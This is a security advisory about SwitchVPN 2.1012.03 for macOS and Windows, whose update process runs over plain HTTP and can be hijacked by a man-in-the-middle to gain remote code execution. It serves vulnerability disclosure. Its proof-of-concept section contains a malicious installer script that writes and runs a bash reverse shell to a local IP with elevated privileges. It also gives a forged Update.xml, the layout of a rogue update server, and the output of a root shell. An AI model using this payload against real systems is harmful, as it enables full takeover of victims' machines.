SwitchVPN For MacOS / Windows 2.1012.03 Man-In-The-Middle

2018-11-14T00:00:00
ID PACKETSTORM:150333
Type packetstorm
Reporter Bernd Leitner
Modified 2018-11-14T00:00:00

Description

                                        
                                            `=======================================================================  
Title: Insecure Update Process and RCE  
Product: SwitchVPN for MacOS, Windows  
Vulnerable version: 2.1012.03  
CVE ID: Requested  
Impact: Critical  
Homepage: https://switchvpn.net/  
Identified: 2018-11-01  
By: Bernd Leitner (bernd.leitner [at] gmail dot com)  
=======================================================================  
  
Vendor description:  
-------------------  
"By 2015 we were frustrated that the free internet we loved was under  
threat.  
As experts in online security we believed we could solve this problem. So we  
came together as a team to make SwitchVPN, a simple and powerful app to keep  
the internet free. SwitchVPN is simple. Install it on your phone, tablet or  
laptop, then just switch it on to keep the internet free. SwitchVPN is  
powerful.  
Our exclusive VPN Service technology is constantly being upgraded by a  
dedicated  
team of internet security experts."  
  
Source: https://switchvpn.net/  
  
  
Business recommendation:  
------------------------  
By exploiting the vulnerability documented in this advisory, an attacker  
can leverage the update process to install malware or execute arbitrary code  
and fully compromise the system.  
  
Users are urged to disable auto-updates and do not run the manual update  
utility  
until the issue has been fixed.  
  
  
Vulnerability overview/description:  
-----------------------------------  
Insecure Update Process  
  
The update process in the SwitchVPN client is vulnerable to a MiTM  
(man-in-the-middle) attack. The client either checks for the availability  
of  
a new version using the integrated auto-update function, or the user can  
manually initiate an update using an update utility. Version information is  
pulled from a remote XML file and compared to the version number of the  
currently installed SwitchVPN client.  
  
All requests are transmitted over HTTP, which means that an attacker on the  
same network is able to intercept and manipulate the traffic.  
  
This means, an attacker can trigger the SwitchVPN client to download a  
malicious update package which will be installed on the device. In addition  
to that, an attacker is able to implant an installation script  
(installscript.qs)  
which will get executed immediately with elevated privileges. When  
auto-update  
is enabled (which is the default setting), this process happens completely  
transparent to the user.  
  
  
Proof of concept  
-----------------  
  
In order to demonstrate the issue, a PoC for spawning a remote shell on  
MacOS is  
presented. A demonstration video can be (temporarily) downloaded from:  
https://www.dropbox.com/s/zwczouzh922z2un/poc_switchvpn_update.mov  
  
NOTE: Delivering a malicious payload through the main update package can be  
set up  
the same way:  
  
1) Prepare malicious installscript.qs:  
============================================================================================  
...  
Component.prototype.createOperations = function()  
{  
component.createOperations();  
  
installer.execute("touch", "/tmp/pwn.sh");  
installer.execute("/bin/sh", new Array("-c", 'echo "bash -i >& /dev/tcp/  
192.168.1.2/9999 0>&1" >> /tmp/pwn.sh'));  
installer.execute("/bin/sh", new Array("-c", "chmod 755 /tmp/pwn.sh"));  
component.addElevatedOperation("Execute", "/tmp/pwn.sh");  
  
installer.installationFinished.connect(this,  
Component.prototype.installationFinishedPageIsShown);  
}  
Component.prototype.installationFinishedPageIsShown = function()  
{  
console.log("Component.prototype.installationFinishedPageIsShown\n\n");  
}  
...  
============================================================================================  
  
2) Store "installscript.qs" in folder "com.svpn.osx" and compress to  
"2.6666.03meta.7z":  
============================================================================================  
mb:~ b$ shasum 2.6666.03meta.7z  
20ebcbe4ff4f9876b3f49bf6db74a1b89d19100f 2.6666.03meta.7z  
============================================================================================  
  
3) Prepare "Update.xml" which will be delivered to SwitchVPN client:  
============================================================================================  
<Updates>  
<ApplicationName>{AnyApplication}</ApplicationName>  
<ApplicationVersion>1.0.0</ApplicationVersion>  
<Checksum>true</Checksum>  
<PackageUpdate>  
<Name>com.svpn.osx</Name>  
<DisplayName>Switch VPN</DisplayName>  
<Description>Switch VPN</Description>  
<Script>installscript.qs</Script>  
<Version>2.6666.03</Version> // <----- New (high) version number to trigger  
update  
<ReleaseDate>2017-10-12</ReleaseDate>  
<Default>true</Default>  
<ForcedInstallation>true</ForcedInstallation>  
<RequiresAdminRights>true</RequiresAdminRights>  
<UpdateFile CompressedSize="12805545" OS="Any" UncompressedSize="33330707"/>  
<DownloadableArchives>SwitchVPN.app.7z</DownloadableArchives>  
<SHA1>20ebcbe4ff4f9876b3f49bf6db74a1b89d19100f</SHA1> // <----- SHA-1 hash  
of 2.6666.03meta.7z  
</PackageUpdate>  
</Updates>  
============================================================================================  
  
4) Perform MiTM attack (e.g. using arpspoof, bettercap, etc...)  
============================================================================================  
NOTE: Setting up a MiTM environment won't be discussed in this advisory.  
  
Create the following folder structure for the malicious web-server:  
/updates/osx/repo/com.svpn.osx  
  
Store Update.xml to:  
/updates/osx/repo/Update.xml  
  
Store malicious update data to:  
/updates/osx/repo/com.svpn.osx/  
-rw-r--r--@ 1 b staff 12805505 Nov 1 14:37 2.6666.03SwitchVPN.app.7z  
-rw-r--r--@ 1 b staff 40 Nov 1 14:37 2.6666.03SwitchVPN.app.7z.sha1  
-rw-r--r--@ 1 b staff 526 Nov 1 20:36 2.6666.03meta.7z <-----  
contains malicious "installscript.qs"  
============================================================================================  
  
5) Start SwitchVPN client or run the manual update utility:  
============================================================================================  
# Requests are successfully redirected to our web-server  
  
Serving HTTP on 0.0.0.0 port 80 ...  
127.0.0.1 - - [01/Nov/2018 22:26:59] "GET  
/updates/osx/repo/Updates.xml?1775745742 HTTP/1.1" 200 -  
127.0.0.1 - - [01/Nov/2018 22:26:59] "GET  
/updates/osx/repo/com.svpn.osx/2.6666.03meta.7z HTTP/1.1" 200 -  
127.0.0.1 - - [01/Nov/2018 22:27:01] "GET  
/updates/osx/repo/Updates.xml?457235306 HTTP/1.1" 200 -  
127.0.0.1 - - [01/Nov/2018 22:27:01] "GET  
/updates/osx/repo/com.svpn.osx/2.6666.03meta.7z HTTP/1.1" 200 -  
127.0.0.1 - - [01/Nov/2018 22:27:01] "GET  
/updates/osx/repo/com.svpn.osx/2.6666.03SwitchVPN.app.7z.sha1 HTTP/1.1" 200  
-  
127.0.0.1 - - [01/Nov/2018 22:27:01] "GET  
/updates/osx/repo/com.svpn.osx/2.6666.03SwitchVPN.app.7z HTTP/1.1" 200 -  
...  
============================================================================================  
  
6) Receive reverse shell:  
============================================================================================  
# Start netcat listener before starting SwitchVPN client  
  
mb:~ b$ nc -l 9999  
  
bash: no job control in this shell  
bash-3.2# whoami  
root  
============================================================================================  
  
Vulnerable / tested versions:  
-----------------------------  
The following version has been tested and found to be vulnerable: 2.1012.03.  
Earlier versions might be vulnerable as well. Both, the Windows and MacOS  
versions are vulnerable.  
  
  
Vendor contact timeline:  
------------------------  
2018-11-01: Contacted vendor through management@switchvpn.net  
2018-11-02: Sent advisory and link to PoC video to management@switchvpn.net  
2018-11-11: Requested update from vendor  
2018-11-12: Informed vendor about advisory release  
  
Solution:  
---------  
None.  
  
  
Workaround:  
-----------  
None.  
  
  
EOF B. Leitner / @2018  
  
  
`